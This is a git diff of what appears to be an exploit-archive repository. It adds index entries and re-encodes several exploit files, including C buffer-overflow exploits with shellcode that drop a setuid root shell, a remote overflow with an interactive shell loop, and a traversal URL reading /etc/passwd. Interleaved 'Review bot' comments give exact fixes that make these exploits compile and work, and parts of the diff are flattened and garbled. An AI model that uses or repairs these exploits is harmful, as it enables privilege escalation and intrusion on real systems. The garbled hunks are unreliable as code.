diff --git a/files.csv b/files.csv
index c9421cdfc..7520955d4 100755
--- a/files.csv
+++ b/files.csv
@@ -33336,7 +33336,7 @@ id,file,description,date,author,platform,type,port
 36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
 36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
 36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
-36930,platforms/multiple/webapps/36930.txt,"WordPress Freshmail - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
+36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
 36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
@@ -35895,3 +35895,6 @@ id,file,description,date,author,platform,type,port 39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443 39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0 +39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0 +39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0 +39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443 diff --git a/platforms/cgi/webapps/21558.txt b/platforms/cgi/webapps/21558.txt index d68a0bd89..8ddd8b10d 100755 --- a/platforms/cgi/webapps/21558.txt +++ b/platforms/cgi/webapps/21558.txt @@ -4,4 +4,4 @@ My Postcards is a commercial available eletronic postcard system. It is availabl The magiccard.cgi script does not properly handle some types of input. As a result, it may be possible for a remote user to specify the location of a specific file on the system hosting the My Postcards software. Upon specifying the location of a file that is readable by the web server process, the user could disclose the contents of the specified file. -http://www.example.com/cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/freebsd/local/19649.c b/platforms/freebsd/local/19649.c index 273c6d53c..7e8bd37aa 100755 --- a/platforms/freebsd/local/19649.c 
+++ b/platforms/freebsd/local/19649.c @@ -4,7 +4,7 @@ There is a buffer overflow vulnerability known to be present in the version of g /* - * gdc exploit for Freebsd-3.3 yields euid=3D0(root) + * gdc exploit for Freebsd-3.3 yields euid=0(root) * by default, only group wheel (or whatever your trusted gated group is)= * and root can run gdc diff --git a/platforms/freebsd/local/19676.c b/platforms/freebsd/local/19676.c index 3904a5057..cde486107 100755 --- a/platforms/freebsd/local/19676.c +++ b/platforms/freebsd/local/19676.c 
@@ -6,71 +6,65 @@ The binary itself is subject to a buffer overflow attack (which may be launched The user does not have to have a valid $DISPLAY to exploit this. -/* = - - * xsoldier exploit for Freebsd-3.3-RELEASE - * Drops a suid root shell in /bin/sh - * Brock Tellier btellier@usa.net - */ +/* +* xsoldier exploit for Freebsd-3.3-RELEASE +* Drops a suid root shell in /bin/sh +* Brock Tellier btellier@usa.net +*/ #include -char shell[]=3D /* mudge@l0pht.com */ - "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" - "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" - "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" - "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; +char shell[]= /* mudge@l0pht.com */ + "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" + "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" + "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" + "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui"; #define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n" void buildui() { FILE *fp; - char cc[100]; - fp =3D fopen("/tmp/ui.c", "w"); - fprintf(fp, CODE); - fclose(fp); - snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); - system(cc); + char cc[100]; + fp = fopen("/tmp/ui.c", "w"); + fprintf(fp, CODE); + fclose(fp); + snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c"); + system(cc); } main (int argc, char *argv[] ) { - int x =3D 0; - int y =3D 0; - int offset =3D 0; - int bsize =3D 4400; - char buf[bsize]; - int eip =3D 0xbfbfdb65; /* works for me */ - buildui(); +int x = 0; +int y = 0; +int offset = 0; +int bsize = 4400; +char buf[bsize]; +int eip = 0xbfbfdb65; /* works for me */ +buildui(); - if (argv[1]) { = - - offset =3D atoi(argv[1]); - eip =3D eip + offset; - } - fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE +if (argv[1]) { + offset = atoi(argv[1]); + eip = eip + offset; +} +fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE \n"); - 
fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); - fprintf(stderr, "eip=3D0x%x offset=3D%d buflen=3D%d\n", eip, offset, bsi= -ze); - = +fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); +fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); - for ( x =3D 0; x < 4325; x++) buf[x] =3D 0x90; - fprintf(stderr, "NOPs to %d\n", x); - = +for ( x = 0; x < 4325; x++) buf[x] = 0x90; + fprintf(stderr, "NOPs to %d\n", x); - for ( y =3D 0; y < 67 ; x++, y++) buf[x] =3D shell[y]; - fprintf(stderr, "Shellcode to %d\n",x); - = +for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; + fprintf(stderr, "Shellcode to %d\n",x); + + buf[x++] = eip & 0x000000ff; + buf[x++] = (eip & 0x0000ff00) >> 8; + buf[x++] = (eip & 0x00ff0000) >> 16; + buf[x++] = (eip & 0xff000000) >> 24; + fprintf(stderr, "eip to %d\n",x); - buf[x++] =3D eip & 0x000000ff; - buf[x++] =3D (eip & 0x0000ff00) >> 8; - buf[x++] =3D (eip & 0x00ff0000) >> 16; - buf[x++] =3D (eip & 0xff000000) >> 24; - fprintf(stderr, "eip to %d\n",x); - - buf[bsize]=3D'\0'; +buf[bsize]='\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); -} +} \ No newline at end of file diff --git a/platforms/hardware/remote/17507.py b/platforms/hardware/remote/17507.py index 3d6f541da..af08b7cf4 100755 --- a/platforms/hardware/remote/17507.py +++ b/platforms/hardware/remote/17507.py 
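Review bot: `buf[bsize]='\0';` near the end of the hunk writes one element past `char buf[bsize]` (valid indices are 0..bsize-1), so the terminator lands outside the array; the re-indentation keeps this off-by-one. Keeping the write in bounds is a one-line change, `buf[bsize - 1] = '\0';`, or the array can be declared one byte longer with `char buf[bsize + 1];`. The `"xsoldier exploit for FreeBSD 3.3-RELEASE` literal also appears to be separated from its closing `\n");` by a physical line break (the closing fragment is a context line), which would leave an unterminated string constant on both sides of the diff; joining the two pieces onto one line fixes that. In `buildui`, `fp = fopen("/tmp/ui.c", "w");` is never checked for NULL, so a failed open is dereferenced by the following `fprintf`.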
@@ -1,4 +1,103 @@ #!/usr/bin/python + +############################################################################### +# +#Title : Avaya IP Office Manager TFTP Server Directory Traversal Vulnerability +#Author : Veerendra G.G from SecPod Technologies (www.secpod.com) +#Vendor : http://www.avaya.com/usa/product/ip-office +#Advisory : http://www.avaya.com/usa/product/ip-office +# http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap +# http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py +# http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +#Version : Avaya IP Office Manager TFTP Server Version 8.1 +#Date : 08/07/2011 +# +################################################################################ +# +#SecPod ID: 1017 25/05/2011 Issue Discovered +# 31/05/2011 Vendor Notified +# No Response from the Vendor +# 08/07/2011 Advisory Released +# +# +#Class: Information Disclosure Severity: Medium +# +# +#Overview: +#--------- +#Avaya IP Office Manager TFTP Server Version 8.1 is prone to a Directory +#Traversal vulnerability. +# +# +#Technical Description: +#---------------------- +#The vulnerability is caused due to improper validation to Read Request +#Parameter containing '../' sequences, which allows attackers to read +#arbitrary files via directory traversal attacks. +# +# +#Impact: +#-------- +#Successful exploitation could allow an attacker to to obtain sensitive +#information, which can lead to launching further attacks. +# +# +#Affected Software: +#------------------ +#Avaya IP Office Manager TFTP Server Version 8.1 +# +# +#Tested on: +#----------- +#Avaya IP Office Manager TFTP Server Version 8.1 on Windows XP SP3. 
+# +# +#References: +#----------- +#http://secpod.org/blog/?p=225 +#http://www.avaya.com/usa/product/ip-office +#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap +#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py +#http://secpod.org/advisories/SECPOD_Avaya_IP_Manager_TFTP_Dir_Trav.txt +# +# +#Proof of Concept: +#---------------- +#http://secpod.org/SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py +#http://secpod.org/SECPOD_Avaya-IP-Manager-TFTP-Dir-Trav.pcap +# +# +#Solution: +#---------- +#Not available +# +# +#Risk Factor: +#------------- +# CVSS Score Report: +# ACCESS_VECTOR = NETWORK +# ACCESS_COMPLEXITY = LOW +# AUTHENTICATION = NOT_REQUIRED +# CONFIDENTIALITY_IMPACT = PARTIAL +# INTEGRITY_IMPACT = NONE +# AVAILABILITY_IMPACT = NONE +# EXPLOITABILITY = PROOF_OF_CONCEPT +# REMEDIATION_LEVEL = UNAVAILABLE +# REPORT_CONFIDENCE = CONFIRMED +# CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N) +# CVSS Temporal Score = 4.5 +# Risk factor = Medium +# +# +#Credits: +#-------- +#Veerendra G.G of SecPod Technologies has been credited with the discovery of +#this vulnerability. +# +# +#SECPOD_Exploit-Avaya-IP-Manager-Dir-Trav.py: +# + ############################################################################## # Exploit : http://secpod.com/blog/?p=225 # http://secpod.org/Exploit-Avaya-IP-Manager-Dir-Trav.py diff --git a/platforms/hardware/webapps/23250.txt b/platforms/hardware/webapps/23250.txt index 4de0fb724..7870f94bc 100755 --- a/platforms/hardware/webapps/23250.txt +++ b/platforms/hardware/webapps/23250.txt 
@@ -35,27 +35,27 @@ Length: unspecified [application/octet-stream Content-transfer-encoding: bi= nary] Saving to: =E2=80=9Cfilename.gwc=E2=80=9D - [ <=3D> ] 15,= + [ <=> ] 15,= 927 50.9K/s in 0.3s =20 2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159= 27] $ head -n 10 filename.gwc=20 -CRCVALUE=3D4144540802; +CRCVALUE=4144540802; #<> -Version=3D1.1; -Created Date=3D2012/12/8; -Created Time=3D21:24:43; -Model Number=3DDPC2420; -Serial Number=3D234905123; -User Password=3Dky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw= +Version=1.1; +Created Date=2012/12/8; +Created Time=21:24:43; +Model Number=DPC2420; +Serial Number=234905123; +User Password=ky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw= l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR 7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL= Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V= ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6 -3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg=3D=3D; +3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg==; [---OUTPUT OMITTED FOR SPACE REASONS---] [0x02]> - Persistent XSS 
@@ -94,12 +94,12 @@ lain text easily.=20 0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/ 0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application 0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli - 0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=3D0.= + 0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=0.= 9 - 0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=3D0.8..Acc= + 0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=0.8..Acc= e 0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en- - 0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=3D0.5..Ac= + 0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=0.5..Ac= c 0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz 0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con @@ -109,13 +109,13 @@ c 0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A 0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba 0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3 - 0x01a0: 1b4e 1134 640a 054b ZAo=3D=3D.... + 0x01a0: 1b4e 1134 640a 054b ZAo==.... - From 0x0180 offset to the end of the packet payload the attacker could ge= t the password=20 encoded with Base64 and simply convert it to plain text: -$ echo aWFtYXBhc3N3ZAo=3D=3D | base64 -d +$ echo aWFtYXBhc3N3ZAo== | base64 -d iamapassword - --- @@ -136,5 +136,5 @@ zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9 s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G E7C4vqJfmBNShPTbtb67 -=3DEzto +=Ezto -----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/linux/dos/22370.txt b/platforms/linux/dos/22370.txt index a233d3b5b..ad94b261d 100755 --- a/platforms/linux/dos/22370.txt +++ b/platforms/linux/dos/22370.txt @@ -8,14 +8,14 @@ From xxx@corest.com Wed Mar 5 14:06:02 2003 Subject: xxx 
From: X X. X To: xxx@corest.com -Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y" +Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y" Message-Id: <1046884154.1731.5.camel@vaiolin> Mime-Version: 1.0 Date: 05 Mar 2003 14:09:14 -0300 ---=3D-mTDu5zdJIsixETTwCF5Y -Content-Disposition: inline; filename=3Dname -Content-Type: application/octet-stream; name=3Dname +--=-mTDu5zdJIsixETTwCF5Y +Content-Disposition: inline; filename=name +Content-Type: application/octet-stream; name=name Content-Transfer-Encoding: 7bit begin 600 phase2 @@ -27,4 +27,4 @@ M-#A(+$(Q(2A$(2DU4U4W+R186#5%53(N,SQ-,3-!-RTU*%HM4R4Y"C,J5#A- ?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@ end ---=3D-mTDu5zdJIsixETTwCF5Y-- \ No newline at end of file +--=-mTDu5zdJIsixETTwCF5Y-- \ No newline at end of file diff --git a/platforms/linux/local/19384.c b/platforms/linux/local/19384.c index 7333cef40..c1c8ab522 100755 --- a/platforms/linux/local/19384.c +++ b/platforms/linux/local/19384.c 
@@ -30,89 +30,89 @@ The LPRng software is an enhanced, extended, and portable version of the Berkele int main(int argc, char **argv) { - int sock; - struct sockaddr_in dest_sin; - struct sockaddr_in src_sin; - struct hostent *hp; - unsigned long ipnum; - char line[256]; - int mode =3D 0; + int sock; + struct sockaddr_in dest_sin; + struct sockaddr_in src_sin; + struct hostent *hp; + unsigned long ipnum; + char line[256]; + int mode = 0; - if (argc < 2) - { - fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); - exit(EXIT_FAILURE); - } + if (argc < 2) + { + fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); + exit(EXIT_FAILURE); + } - if (argc >=3D 3) - { - if (!strcmp(argv[2], "start")) - mode =3D 1; - else if (strcmp(argv[2], "stop")) - { - fprintf(stderr, "Invalid mode. Use stop or start.\n"); - fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); - exit(EXIT_FAILURE); - } - } - =09 - snprintf(line, sizeof(line), "%c%s root %s %s\n",=20 - 6, argv[1], (mode)? "start":"stop", argv[1]); + if (argc >= 3) + { + if (!strcmp(argv[2], "start")) + mode = 1; + else if (strcmp(argv[2], "stop")) + { + fprintf(stderr, "Invalid mode. Use stop or start.\n"); + fprintf(stderr, "Usage: %s printer [stop|start]\n", argv[0]); + exit(EXIT_FAILURE); + } + } + =09 + snprintf(line, sizeof(line), "%c%s root %s %s\n",=20 + 6, argv[1], (mode)? 
"start":"stop", argv[1]); - memset(&dest_sin, 0, sizeof(struct sockaddr_in)); - dest_sin.sin_port =3D htons((short) DST_PORT); + memset(&dest_sin, 0, sizeof(struct sockaddr_in)); + dest_sin.sin_port = htons((short) DST_PORT); - ipnum =3D (unsigned long) inet_addr(HOST); - if (ipnum !=3D ((unsigned long) INADDR_NONE)) - { - dest_sin.sin_family =3D AF_INET; - dest_sin.sin_addr.s_addr =3D ipnum; - } - else - { - if ((hp =3D gethostbyname(HOST)) =3D=3D NULL) - { - fprintf(stderr, "Host lookup failed.\n"); - exit(EXIT_FAILURE); - } + ipnum = (unsigned long) inet_addr(HOST); + if (ipnum != ((unsigned long) INADDR_NONE)) + { + dest_sin.sin_family = AF_INET; + dest_sin.sin_addr.s_addr = ipnum; + } + else + { + if ((hp = gethostbyname(HOST)) == NULL) + { + fprintf(stderr, "Host lookup failed.\n"); + exit(EXIT_FAILURE); + } - dest_sin.sin_family =3D hp->h_addrtype; - memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0], - (size_t)hp->h_length); - } + dest_sin.sin_family = hp->h_addrtype; + memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0], + (size_t)hp->h_length); + } - if ((sock =3D socket(AF_INET, SOCK_STREAM, 0)) < 0) - { - perror("Socket call failed"); - exit(EXIT_FAILURE); - } + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) + { + perror("Socket call failed"); + exit(EXIT_FAILURE); + } - src_sin.sin_family =3D AF_INET; - src_sin.sin_addr.s_addr =3D INADDR_ANY; - src_sin.sin_port =3D htons((u_short) SRC_PORT); + src_sin.sin_family = AF_INET; + src_sin.sin_addr.s_addr = INADDR_ANY; + src_sin.sin_port = htons((u_short) SRC_PORT); - if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0) - { - perror("Bind failed"); - exit(EXIT_FAILURE); - } + if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0) + { + perror("Bind failed"); + exit(EXIT_FAILURE); + } - if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0) - { - close(sock); - perror("Connect failed"); - exit(EXIT_FAILURE); - } + if (connect(sock, (struct sockaddr *)&dest_sin, 
sizeof(dest_sin)) < 0) + { + close(sock); + perror("Connect failed"); + exit(EXIT_FAILURE); + } - if (write(sock, line, strlen(line)) <=3D 0) - { - perror("Write failed"); - exit(EXIT_FAILURE); - } + if (write(sock, line, strlen(line)) <= 0) + { + perror("Write failed"); + exit(EXIT_FAILURE); + } - close(sock); + close(sock); - return EXIT_SUCCESS; + return EXIT_SUCCESS; } ---- stop lpcontrol.c ----------------------------------------------- diff --git a/platforms/linux/local/19953.c b/platforms/linux/local/19953.c index b56357a0e..0ca3a26f5 100755 --- a/platforms/linux/local/19953.c +++ b/platforms/linux/local/19953.c @@ -51,7 +51,7 @@ box, // Gee, Aleph1 his shellcode is back once more -char shellcode[] =3D +char shellcode[] = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" @@ -63,16 +63,16 @@ unsigned long get_sp(void) { main(int argc, char **argv) { - int buf_size =3D 71; - int offset=3D0, i; + int buf_size = 71; + int offset=0, i; char *overflow; char *ovoff; - long addr, ptr=3D0x0804c7d0; + long addr, ptr=0x0804c7d0; - if(argc>1) offset =3D atoi(argv[1]); - if(argc>2) buf_size =3D atoi(argv[2]); - if(argc>3) ptr =3D strtol(argv[3], (char **) NULL, 16); + if(argc>1) offset = atoi(argv[1]); + if(argc>2) buf_size = atoi(argv[2]); + if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16); printf("##############################################\n"); printf("# fdmount Slack 4/7 exploit - by Scrippie #\n"); 
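Review bot: Quoted-printable residue survives on the new side of this hunk: the added line consisting of `=09` and the trailing `=20` on `snprintf(line, sizeof(line), "%c%s root %s %s\n",=20` are the QP encodings of a tab and a space, and left in place they keep `main` from compiling (`=20` tokenizes as `= 20` after the comma). The `=3D` pass should decode these as well: make the `=09` line blank and end the `snprintf` line at the comma, `snprintf(line, sizeof(line), "%c%s root %s %s\n",`. The same class of leftover soft-break `=` splits a token across two new-side lines in the 23524.c hunk (`PRO=` / `T_WRITE`) and in the 19953.c hunk (`(char =` / `*)malloc(...)`).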
@@ -82,19 +82,19 @@ main(int argc, char **argv) printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", = ptr); - if(!(overflow =3D (char = + if(!(overflow = (char = *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) { fprintf(stderr, "Outta memory - barging out\n"); exit(-1); } - overflow[0] =3D '/'; + overflow[0] = '/'; - for(i=3D1;i #include -char *shell=3D +char *shell= "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17" "\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e" "\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89" @@ -32,7 +32,7 @@ char *shell=3D #define BUFLEN 1200 char buf[BUFLEN]; -int offset=3DOFFSET; +int offset=OFFSET; int nbytes; int sock; struct sockaddr_in sa; @@ -47,24 +47,24 @@ v2.1.4-R3\n"); exit(0); } if(argc>2) - offset=3Datoi(argv[2]); + offset=atoi(argv[2]); memset(buf,0x90,BUFLEN); memcpy(buf+800,shell,strlen(shell)); - for(i=3D901;ih_addr,hp->h_length); - if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) { + if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) { perror("connect()"); exit(0); } @@ -77,17 +77,17 @@ fflush(stdout); FD_SET(0,&input); FD_SET(sock,&input); if((select(sock+1,&input,NULL,NULL,NULL))<0) { - if(errno=3D=3DEINTR) continue; + if(errno==EINTR) continue; printf("CONNECTION CLOSED...\n"); = fflush(stdout); exit(1); } if(FD_ISSET(sock,&input)) { - nbytes=3Dread(sock,buf,BUFLEN); - for(i=3D0;i126) || (a<32)) ){ - buf[i]=3D' '; + nbytes=read(sock,buf,BUFLEN); + for(i=0;i126) || (a<32)) ){ + buf[i]=' '; } } write(1,buf,nbytes); diff --git a/platforms/multiple/dos/23524.c b/platforms/multiple/dos/23524.c index fdfee6d60..855ff52ba 100755 --- a/platforms/multiple/dos/23524.c +++ b/platforms/multiple/dos/23524.c 
@@ -34,8 +34,8 @@ nitr0us@burial:~$ gdb -q idaq Program received signal SIGTRAP, Trace/breakpoint trap. [Switching to Thread 0xb6860760 (LWP 3638)] -0xb55f7694 in default_notification_handler (reader=3D@0xbfbffae0, - notif=3Dreader_t::err_shstrndx) at reader.cpp:33 +0xb55f7694 in default_notification_handler (reader=@0xbfbffae0, + notif=reader_t::err_shstrndx) at reader.cpp:33 33 reader.cpp: No such file or directory. in reader.cpp Current language: auto; currently c++ @@ -75,7 +75,7 @@ verify if e_shstrndx > e_shnum before referencing it. #define ELFCLASS32 1 /* 32-bit objects */ #define ELFDATA2LSB 1 /* 2's complement, little endian */ -const char e_magic[4] =3D { 0x7f, 'E', 'L', 'F' }; +const char e_magic[4] = { 0x7f, 'E', 'L', 'F' }; typedef uint16_t Elf32_Half; typedef uint32_t Elf32_Word; @@ -128,7 +128,7 @@ fprintf(stderr, "Usage: %s \n", argv[0]); exit(-1); } -if((fd =3D open(argv[1], O_RDWR)) =3D=3D -1){ +if((fd = open(argv[1], O_RDWR)) == -1){ perror("open"); exit(-1); } @@ -139,8 +139,8 @@ exit(-1); } // Mapping to memory only the necessary bytes [sizeof(header)] -if((header =3D (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO= -T_WRITE, MAP_SHARED, fd, 0)) =3D=3D MAP_FAILED){ +if((header = (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO= +T_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){ perror("mmap"); close(fd); exit(-1); 
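Review bot: In the `@@ -139,8` hunk, `mmap(NULL, sizeof(header), ...)` passes the size of the `Elf32_Ehdr *` pointer, not the size of the ELF header that the preceding comment says is being mapped; the later `header->e_shnum` and `header->e_shstrndx` stores only stay inside the mapping because mmap rounds the length up to a page. The intended length is the pointed-to struct, `if((header = (Elf32_Ehdr *) mmap(NULL, sizeof *header, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){`, which also folds the two split fragments back onto one line.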
@@ -156,17 +156,17 @@ printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]); srand(time(NULL)); // seed for rand() -new_shnum =3D (Elf32_Half) rand() % 0x1337; -new_shstrndx =3D (Elf32_Half) 0; +new_shnum = (Elf32_Half) rand() % 0x1337; +new_shstrndx = (Elf32_Half) 0; while(new_shstrndx < new_shnum) -new_shstrndx =3D (Elf32_Half) rand() % 0xDEAD; +new_shstrndx = (Elf32_Half) rand() % 0xDEAD; -header->e_shnum =3D new_shnum; -header->e_shstrndx =3D new_shstrndx; +header->e_shnum = new_shnum; +header->e_shstrndx = new_shstrndx; // Synchronize the ELF in file system with the previous memory mapped -if(msync(NULL, 0, MS_SYNC) =3D=3D -1){ +if(msync(NULL, 0, MS_SYNC) == -1){ perror("msync"); close(fd); exit(-1); @@ -189,25 +189,25 @@ int isELF(int fd) { Elf32_Ehdrheader; -if(read(fd, &header, sizeof(header)) =3D=3D -1){ +if(read(fd, &header, sizeof(header)) == -1){ perror("isELF(): read"); return 0; } /* magic number verification */ -if(memcmp(header.e_ident, e_magic, 4) !=3D 0){ +if(memcmp(header.e_ident, e_magic, 4) != 0){ fprintf(stderr, "The argument given is not an ELF file !\n"); return 0; } /* 32-bit class verification */ -if(header.e_ident[4] !=3D ELFCLASS32){ +if(header.e_ident[4] != ELFCLASS32){ fprintf(stderr, "Only 32-bit ELF files supported !\n"); return 0; } /* little-endian verification */ -if(header.e_ident[5] !=3D ELFDATA2LSB){ +if(header.e_ident[5] != ELFDATA2LSB){ fprintf(stderr, "Only little-endian ELF files supported !\n"); return 0; } diff --git a/platforms/multiple/webapps/24744.txt b/platforms/multiple/webapps/24744.txt index c7ec2ad38..b02c1023e 100755 --- a/platforms/multiple/webapps/24744.txt +++ b/platforms/multiple/webapps/24744.txt @@ -22,7 +22,7 @@ paths via Spring Security configuration or other means. Example: A request to: -/app/api/rpc/users/get?offset=3DOFFSET +/app/api/rpc/users/get?offset=OFFSET will return the following: 
